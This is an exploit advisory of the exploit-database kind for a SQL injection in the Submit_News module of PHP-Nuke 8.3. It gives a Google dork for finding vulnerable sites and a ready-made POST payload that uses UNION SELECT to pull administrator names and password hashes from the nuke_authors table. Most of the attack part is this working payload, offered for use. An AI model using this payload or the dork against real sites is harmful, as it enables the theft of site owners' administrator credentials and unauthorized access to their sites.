The News module in PHP-Nuke version 8.3 suffers from a remote SQL injection vulnerability.
a3dcb3ff99610710137c524c5160bb879d6fde1d17ff511a654c9f5276aa57e5
# title : phpnuke 8.3 sql injection vulnerability
# Exploit Title: phpnuke 8.3 submit news module sql injection vulnerability
# Google Dork: inurl:modules.php?name=Submit_News
# Date: 5/24/2014
# Exploit Author: ali ahmady -- Iranian Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: phpnuke.org
# Software Link: -
# Version: 8.3
# Tested on: windows - linux
Submit_News module is vulnerable to sqli at review post step
subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever
tools used : live http headers
greets : b0x , Phantom_X , VIRkid , Mohamm@d , milad22 , zeus REKCAH